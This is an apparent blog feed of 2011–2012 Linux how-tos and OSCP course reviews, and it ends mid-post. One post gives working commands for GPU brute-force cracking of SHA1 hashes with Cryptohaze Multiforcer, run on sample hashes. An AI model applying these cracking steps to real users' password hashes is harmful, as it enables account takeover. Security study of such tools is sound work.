<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-11198812</id><updated>2012-01-28T11:23:37.320+08:00</updated><category term='TP-Link'/><category term='Cryptohaze-Multiforcer'/><category term='AES'/><category term='Youtube'/><category term='TorButton'/><category term='checkinstall'/><category term='SQL Injection'/><category term='VideoLan'/><category term='Hydra'/><category term='Dradis'/><category term='Mobile Atlas Creator'/><category term='SIP'/><category term='NMap'/><category term='Windows'/><category term='crunch'/><category term='WPA2'/><category term='iBus'/><category term='Compiz'/><category term='Java Compiler'/><category term='Subsonic'/><category term='HSDPA'/><category term='spam'/><category term='Armitage'/><category term='Unity'/><category term='email'/><category term='Vidalia'/><category term='hdaps'/><category term='Video'/><category term='atftpd'/><category term='GMail'/><category term='compress'/><category term='Firefly'/><category term='rtl8192su'/><category term='sysctl'/><category term='Android-x86'/><category term='D-Link DW-131'/><category term='SSH'/><category term='chap2asleap.py'/><category term='GoDaddy'/><category term='Atom D510'/><category term='PDF'/><category term='bcmwl'/><category term='Nexus One'/><category term='extundelete'/><category term='Wireshark'/><category term='Metasploit'/><category term='TKIP'/><category term='PBXes.org'/><category term='USB'/><category term='Wicd'/><category term='touch screen'/><category term='VoIP'/><category term='Firefox'/><category term='Django'/><category term='Snort'/><category term='proxychains'/><category term='Eclipse'/><category term='Ekiga'/><category term='John the Ripper'/><category term='noatime'/><category term='Traditional Chinese'/><category term='GPS Grid Reference'/><category term='ettercap'/><category term='Intel'/><category term='MOTODEV Studio'/><category term='Python'/><category term='LibreOffice'/><category term='Nessus'/><category term='StreakDroid'/><category term='Gigabyte M1028'/><category term='Postfix'/><category term='VirtualBox'/><category term='Full HD'/><category term='OTA'/><category term='Router'/><category term='Back|Track'/><category term='App Inventor for Android'/><category term='Tegaki'/><category term='KVM'/><category term='Course Review'/><category term='msfconsole'/><category term='Adaptec Storage Manager'/><category term='CUDA'/><category term='AMD'/><category term='Apparmor'/><category term='irc'/><category term='SSL'/><category term='Tamper Data'/><category term='g0tmi1k'/><category term='Virtualization'/><category term='SQLmap'/><category term='Untangle'/><category term='ThinkPad X200'/><category term='Banshee'/><category term='r8192se_pci'/><category term='DBAN'/><category term='ebooks'/><category term='Docky'/><category term='ThinkPad X100e'/><category term='Netcat'/><category term='vdpau'/><category term='phpmyadmin'/><category term='znc'/><category term='Privoxy'/><category term='Exploit'/><category term='SimpleStreak'/><category term='alien'/><category term='Adaptec'/><category term='pure-ftpd'/><category term='PHP'/><category term='Gigabyte T1028X'/><category term='Moonlight'/><category term='RTL8191SE'/><category term='Linux'/><category term='DELL Streak'/><category term='THC-pptp-bruter'/><category term='Ubuntu'/><category term='Silverlight'/><category term='Linksys SPA941'/><category term='asleep'/><category term='WPS'/><category term='DirBuster'/><category term='deface'/><category term='Exploit-DB'/><category term='remount'/><category term='Totem'/><category term='Logwatch'/><category term='OpenVPN'/><category term='FreeDOS'/><category term='Flash'/><category term='RamDisk'/><category term='MyGica D689'/><category term='smbclient'/><category term='sip2sip.info'/><category term='Hiawatha'/><category term='SIPDroid'/><category term='OSVDB'/><category term='SCIM'/><category term='X79'/><category term='modeline'/><category term='poedit'/><category term='CakePHP'/><category term='PPStream'/><category term='FeedingBottle'/><category term='my-bnc.net'/><category term='knockknock'/><category term='UNetBootin'/><category term='MySQL'/><category term='WPA'/><category term='HP Mini 110'/><category term='pyrit'/><category term='DroidBooster'/><category term='MariaDB'/><category term='ATi'/><category term='Netdiscover'/><category term='TP-Link TL-WR1043ND'/><category term='Drupal'/><category term='WEP'/><category term='Lenovo'/><category term='Tor Button'/><category term='Proxmox VE'/><category term='XSS'/><category term='tzdata'/><category term='Wireless'/><category term='Common User Passwords Profiler'/><category term='DAPP Media Player'/><category term='norelatime'/><category term='Beini'/><category term='Unity 2D'/><category term='SopCast'/><category term='Unicornscan'/><category term='Froyo'/><category term='HD video'/><category term='HSPA'/><category term='Tor'/><category term='Elastix'/><category term='Radeon'/><category term='X100p'/><category term='csipsimple'/><category term='chmod'/><category term='Android'/><category term='DD-WRT'/><category term='Wired'/><category term='uTouch'/><category term='Spamhaus.org'/><category term='Anaglyph'/><category term='nVidia'/><category term='mount'/><category term='Google DNS'/><category term='Display Card'/><category term='Filezilla'/><category term='Octoshape'/><category term='Java'/><category term='eGalax'/><category term='xchat'/><category term='Metasploitable'/><category term='Rhythmbox'/><category term='RTHK'/><category term='Generic'/><category term='Storage Manager'/><category term='Google Apps'/><category term='OpenJDK'/><title type='text'>Samiux's Blog</title><subtitle type='html'>Open Source is a great idea and it has changed the world!

Open Source forever ....</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://samiux.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default?start-index=101&amp;max-results=100'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>161</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-11198812.post-7574690938793346385</id><published>2012-01-28T01:14:00.001+08:00</published><updated>2012-01-28T11:23:37.329+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VirtualBox'/><title type='text'>HOWTO : Using USB Devices on VirtualBox 4.1.8</title><content type='html'>Using USB devices on VirtualBox 4.1.8, which is installed on Ubuntu 12.04 LTS, is easy.  &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;usermod -a -G vboxusers samiux&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where samiux is the user name&lt;br /&gt;
&lt;br /&gt;
Then, logout and re-login.  Or, reboot your system.&lt;br /&gt;
&lt;br /&gt;
Now, you can use USB devices on VirtualBox without any problem.  However, some devices do not work properly on USB 2.0 enabled on VirtualBox.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-7574690938793346385?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7574690938793346385'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7574690938793346385'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2012/01/howto-using-usb-devices-on-virtualbox.html' title='HOWTO : Using USB Devices on VirtualBox 4.1.8'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5971418976434999027</id><published>2012-01-22T00:49:00.000+08:00</published><updated>2012-01-22T00:49:33.743+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MySQL'/><category scheme='http://www.blogger.com/atom/ns#' term='MariaDB'/><title type='text'>HOWTO : Create a normal user on MySQL and MariaDB</title><content type='html'>Using a root account on the web applications as user is risky.  It is more secure to create a normal user for the web applications.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mysqladmin -u samiux -p create mydatabase&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where &lt;code&gt;samiux&lt;/code&gt; is the normal username and &lt;code&gt;mydatabase&lt;/code&gt; is the name of the database of the web applications&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mysql -u root -p&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER ON mydatabase.* TO 'samiux'@'localhost' IDENTIFIED BY 'mypassword';&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where &lt;code&gt;mypassword&lt;/code&gt; is the password of the user &lt;code&gt;samiux&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5971418976434999027?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5971418976434999027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5971418976434999027'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2012/01/howto-create-normal-user-on-mysql-and.html' title='HOWTO : Create a normal user on MySQL and MariaDB'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8650404645880226687</id><published>2012-01-21T23:46:00.001+08:00</published><updated>2012-01-21T23:48:04.098+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Course Review'/><title type='text'>Course Review - Am I ready for taking Penetration Testing with BackTrack (PWB)</title><content type='html'>If you decided to take the course - &lt;a href="http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/"&gt;Penetration Testing with BackTrack (PWB)&lt;/a&gt;, you are required to make sure your knowledge and hardwares are suitable or not.  I am now going to share my experience with you all.&lt;br /&gt;
&lt;br /&gt;
Although this course is an entry-level course of Offensive Security, you are required to have some knowledge of networking (including TCP/IP) and capable of operating Linux and Windows systems in command line. &lt;br /&gt;
&lt;br /&gt;
You are also required to have some knowledge of programming.  You are not required to be an elite programmer, but you need to understand what a program is and how to read it as well as understand what it is doing.  The involved programming language are perl, c, python and bash shell script.&lt;br /&gt;
&lt;br /&gt;
Using of virtual machine, such as VMWare Player or VirtualBox is required.  It is because most of the students of the course running their BackTrack on the virtual machine instead of a dedicated machine.  That means, you have at least 2GB of system memory for the host computer and guest machine.  At least 1GB RAM for the guest will make you more comfortable.&lt;br /&gt;
&lt;br /&gt;
A reasonable speed of internet connection is required.  The lab is running on OpenVPN and your router (if any) should be capable of handling VPN connecting.  After you registered to the course, you will have chance to test the VPN connection.  If the connection is confirmed fine, you can then make the payment.  Otherwise, you are not suitable to take the course and do not make the payment.&lt;br /&gt;
&lt;br /&gt;
I have connecting the VPN over my Galaxy Nexus and/or Nexus One on 3G data connection via wifi share with no problem.  Anyway, it all depends on the 3G connection quality.&lt;br /&gt;
&lt;br /&gt;
If you will do your lab access at any place, you are suggested to install the BackTrack on the virtul machine and host it on a laptop.  The size of the virtual machine is around 20GB as I find this size is more comfortable.&lt;br /&gt;
&lt;br /&gt;
In addition, it is time.  Make sure you have a lot of time to do the course and lab.  As this course is very hard and time consuming as well as demanding, make sure your family members understood that you have a little time or have no time with them during the course.  Sometimes, I even not sleeping for over 24 hours in order to compromise a box in the lab.&lt;br /&gt;
&lt;br /&gt;
At last, taking care of yourself.  Do not get flu or sick during the course.  Hope you all enjoy the course as I was.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8650404645880226687?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8650404645880226687'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8650404645880226687'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2012/01/course-review-am-i-ready-for-taking.html' title='Course Review - Am I ready for taking Penetration Testing with BackTrack (PWB)'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3282357131111505572</id><published>2012-01-21T18:21:00.004+08:00</published><updated>2012-01-21T20:01:33.699+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Course Review'/><title type='text'>Course Review - Penetration Testing with BackTrack (PWB)</title><content type='html'>&lt;b&gt;The Background&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
About 2 to 3 years ago, I came to know &lt;a href="http://www.backtrack-linux.org/"&gt;BackTrack&lt;/a&gt; 3 and 4.  I did not know what this distribution for.  At that time, I knew that it is for bad guys according to a local computer magazine.&lt;br /&gt;
&lt;br /&gt;
Later, I came to know the term of "Penetration Testing" and I wanted to know more about this kind of technology and skill.  I searched for the videos on the YouTube and learnt something new.  However, I did not fully understand what the videos actually talking about and doing.&lt;br /&gt;
&lt;br /&gt;
Some guys in the internet stated that this course (&lt;a href="http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/"&gt;Penetration Testing with BackTrack&lt;/a&gt;) is teaching you how to use the BackTrack Linux distribution only and nothing more.  Okay, that was not bad at all as I knew nothing about this distribution.  Why not took it a try?&lt;br /&gt;
&lt;br /&gt;
Last year, I decided to take this course to learn more about Penetration Test and registered.  The course vesion is 3.0 at the time when I took it and it is working very well on BackTrack 5 R1.  The price is not high compares with other Information Security courses in the market.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The Course&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This course is designed for beginners just like me.  It requires you have some knowledge of networking and some programming experience as well as to know how to use Linux and Windows systems.  This course is not designed for very skilled and experienced Penetration Testers, in my opinion.&lt;br /&gt;
&lt;br /&gt;
You have a VPN lab, which equipped with several subnets and over 50 machines (I discovered 58), to practice what you have learnt from the course materials.  Those machines in the lab are not designed for simple or single step exploitation.  You are required to use your creative thinking and skill to compromise those machines.&lt;br /&gt;
&lt;br /&gt;
You are not required to compromise all the machines in the lab in order to take the final challenge, the exam.  You can even compromise one machine in the lab and then enroll for the exam.  You have 23 hours and 45 minutes to do the exam and submit the report within the next 24 hours.  You should enroll the exam within 90 days after the expiration of the lab access time unless you extended it.&lt;br /&gt;
&lt;br /&gt;
The compromised machines in the lab is required to document as well as the exercises in the course materials.  In addition, the extra miles in the exercises may count for the exam, I think.  So, I suggest to do them all if you can.&lt;br /&gt;
&lt;br /&gt;
In my opinion, make some friends in the #offsec irc channel may help you to solve some problems during the lab access.  The most interested thing is that the officials at #offsec irc channel will not help you much for the lab.  Sometimes, they may give out hints but sometimes are misleading or useless.  They will also tell you to "Try Harder!".  Yes, "Try Harder!" is their slogan.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The Challenge&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The exam was not easy as I think especially under the pressure.  My exam was started in the late evening, that means, I needed to do the exam overnight in the early beginning due to my time zone.  I was very tired during the exam.  Even I took an hour or so nap, I could not thinking very well.  I did some careless mistakes or silly things during the exam and I was wasting a lot of time.  My mind was blocked with the problems that I came across.  I did not perform very well in the exam.&lt;br /&gt;
&lt;br /&gt;
Finally, the exam was over and the report was submitted.  Within 3 business days, I received an email which informed me that I passed the challenge.  If you passed the challenge, you will be an Offensive Security Certified Professional (OSCP).  I am an OSCP now!  &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The Conclusion&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In conclusion, this course will teach you all the basic Penetration Testing skill and it is worth to take if you are not a very skilled and experienced in this field.  I am very enjoy during the course.  I learn a lot with the lab and course materials.  Recommended!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3282357131111505572?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3282357131111505572'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3282357131111505572'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2012/01/course-review-penetration-testing-with.html' title='Course Review - Penetration Testing with BackTrack (PWB)'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8867327676192197818</id><published>2012-01-19T22:34:00.000+08:00</published><updated>2012-01-19T22:34:00.930+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : BackTrack 5 R1 Minor Bug Fix</title><content type='html'>(A) unicornscan GeoIP not found :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cp /usr/share/GeoIP/GeoIP.dat /usr/local/etc/unicornscan/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(B) Waiting for audio system to respond&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mkdir ~/.config/autostart&lt;br /&gt;
nano ~/.config/autostart/pulseaudio.desktop&lt;br /&gt;
&lt;br /&gt;
[Desktop Entry]&lt;br /&gt;
Type=Application&lt;br /&gt;
Exec=/usr/bin/pulseaudio&lt;br /&gt;
Hidden=false&lt;br /&gt;
NoDisplay=false&lt;br /&gt;
X-GNOME-Autostart-enabled=true&lt;br /&gt;
Name=Pulseaudio&lt;br /&gt;
Comment=Start Pulseaudio&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(C) Wicd cannot connect to D-Bus&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;dpkg-reconfigure wicd&lt;br /&gt;
update-rc.d wicd defaults&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
BackTrack WiKi&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/wiki/index.php/Main_Page"&gt;BackTrack WiKi&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8867327676192197818?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8867327676192197818'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8867327676192197818'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2012/01/howto-backtrack-5-r1-minor-bug-fix.html' title='HOWTO : BackTrack 5 R1 Minor Bug Fix'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1074827275141942102</id><published>2012-01-01T23:44:00.007+08:00</published><updated>2012-01-10T03:52:28.178+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Cryptohaze-Multiforcer'/><title type='text'>HOWTO : Cryptohaze Multiforcer on 2 nVidia GeForce GTX 590 and Intel i7-3930K</title><content type='html'>The Cryptohaze Multiforcer is a high performance CUDA password cracker that is designed to target large lists of hashes. Performance holds very solid with large lists, such that on a suitable server, cracking a list of 1 000 000 passwords is not significantly slower than cracking a list of 10. For anyone who deals with large lists of passwords, this is a very useful tool! Algorithm support includes MD5, NTLM, LM, SHA1, and many others. The official website of Cryptohaze Multiforcer is &lt;a href="http://www.cryptohaze.com/index.php"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Download &lt;a href="http://downloads.sourceforge.net/project/cryptohaze/Cryptohaze-Combined/Cryptohaze-Linux_x64_1_30.tar.bz2?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcryptohaze%2Ffiles%2FCryptohaze-Combined%2F&amp;ts=1325431611&amp;use_mirror=ncu"&gt;Cryptohaze-Linux_x64_1_30.tar.bz2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd Cryptohaze-Linux&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano single_charset&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ABCEDFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&amp;*()_+|}{":?&gt;&lt;`-=\][';/.,&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Hardware Configuration :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
CPU : Intel i7-3930K (12 cores with Hyper-Threading, Socket 2011)&lt;br /&gt;
Motherboard : ASUS SaberTooth X79&lt;br /&gt;
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)&lt;br /&gt;
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2&lt;br /&gt;
Hard Drive : Seagate SATA II 1TB x 2&lt;br /&gt;
Power Supply : Seasonic X-series 1250W&lt;br /&gt;
CPU Heat Sink : Corsair H100 Liquid CPU Cooler&lt;br /&gt;
Case : Corsair Graphite Series 600T Black&lt;br /&gt;
&lt;br /&gt;
Remarks : &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/12/howto-backtrack-5-r1-on-intel-x79.html"&gt;Installation of CUDA on Back|Track 5 R1&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="640" height="480" src="http://www.youtube.com/embed/XfVwSDh5XFY?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1074827275141942102?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1074827275141942102'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1074827275141942102'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2012/01/howto-cryptohaze-multiforcer-on-2.html' title='HOWTO : Cryptohaze Multiforcer on 2 nVidia GeForce GTX 590 and Intel i7-3930K'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/XfVwSDh5XFY/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4535174401059952613</id><published>2011-12-25T16:49:00.001+08:00</published><updated>2011-12-25T16:49:19.311+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Android'/><title type='text'>HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10</title><content type='html'>This tutorial is not my work but is OhHeyitsLou.  Please credit to him.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://ohheyitslou.blogspot.com/2011/12/galaxy-nexus-enable-mtp-file-transfer.html"&gt;Step by step tutorial&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.youtube.com/watch?v=UDsOWvGIPaY"&gt;Youtube step by step tutorial&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4535174401059952613?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4535174401059952613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4535174401059952613'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/12/howto-android-40-galaxy-nexus-file.html' title='HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8652430468243103558</id><published>2011-12-25T03:46:00.001+08:00</published><updated>2012-01-10T03:17:10.543+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='pyrit'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='X79'/><title type='text'>HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card</title><content type='html'>&lt;b&gt;Hardware&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)&lt;br /&gt;
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Installation of BackTrack 5 R1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
BackTrack 5 R1 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards.  However, "&lt;code&gt;nomodeset&lt;/code&gt;" should be applied to the boot option by pressing "tab" on the boot menu.&lt;br /&gt;
&lt;br /&gt;
Install the BackTrack 5 R1 as usual.  When it is required to reboot, do not remove the BackTrack 5 R1 CD.  Boot up the CD accordingly.  After the BackTrack 5 R1 is booted up, mount the hard drive and add "&lt;code&gt;nomodeset&lt;/code&gt;" to boot option of the &lt;code&gt;grub.cfg&lt;/code&gt; at &lt;code&gt;/boot/grub&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
After that, reboot the system and remove the CD.  The system will be boot into BackTrack 5 R1 without problem.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Installation of nVidia display driver&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to &lt;a href="http://developer.nvidia.com/cuda-toolkit-40"&gt;nVidia Deleloper Zone CUDA Toolkit 4.0&lt;/a&gt; to download the following.  Do not enter to X11 by issuing "&lt;code&gt;startx&lt;/code&gt;"; otherwise, the installation will be failed.&lt;br /&gt;
&lt;br /&gt;
(1) Download "&lt;code&gt;Developer Drivers for Linux (270.41.19)&lt;/code&gt;" for the nVidia Driver.&lt;br /&gt;
&lt;br /&gt;
32-bit :&lt;br /&gt;
&lt;code&gt;wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_32_270.41.19.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
64-bit :&lt;br /&gt;
&lt;code&gt;wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_64_270.41.19.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;chmod +x devdriver_4.0_linux_xx_270.41.19.run&lt;br /&gt;
./devdriver_4.0_linux_xx_270.41.19.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(2) Download "&lt;code&gt;CUDA Toolkit for Ubuntu Linux 10.10&lt;/code&gt;" for the CUDA Toolkit.&lt;br /&gt;
&lt;br /&gt;
32-bit :&lt;br /&gt;
